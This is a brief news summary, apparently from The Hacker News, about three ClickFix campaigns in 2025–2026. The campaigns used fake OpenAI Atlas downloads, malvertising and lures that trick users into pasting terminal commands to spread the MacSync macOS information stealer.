"Unlike traditional exploit-based attacks, this method relies entirely on user interaction - usually in the form of copying and executing commands - making it particularly effective against users who may not appreciate the implications of running unknown and obfuscated terminal commands."
"A campaign that used the OpenAI Atlas browser as bait, delivered via sponsored search results on Google, to direct users to a fake Google Sites URL with a download button that, when clicked, displayed instructions to open the Terminal app and paste a command to it."
"A malvertising campaign that leveraged sponsored links tied to searches for queries like 'how to clean up your Mac' on Google to lead users to shared conversations on the legitimate OpenAI ChatGPT site to give the impression that the links were safe."
"A campaign targeting Belgium, India, and parts of North and South America that distributed a new variant of MacSync delivered through ClickFix lures. The latest iteration supports dynamic AppleScript payloads and in-memory execution to evade static analysis, bypass behavioral detections, and complicate incident response."
Three separate ClickFix campaigns have been identified distributing MacSync, a macOS information stealer, through social engineering tactics rather than traditional exploits. The campaigns operate by deceiving users into copying and executing obfuscated terminal commands. The first campaign, in November 2025, used fake OpenAI Atlas browser downloads via Google search results. The second, in December 2025, leveraged malvertising with fake ChatGPT conversations on legitimate OpenAI sites. The third, in February 2026, targeted Belgium, India, and the Americas with an advanced MacSync variant featuring dynamic AppleScript payloads and in-memory execution capabilities to evade detection. All campaigns exploit user trust and lack of awareness regarding terminal command execution risks.
#macos-malware #clickfix-campaigns #social-engineering #information-stealer #terminal-command-execution
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]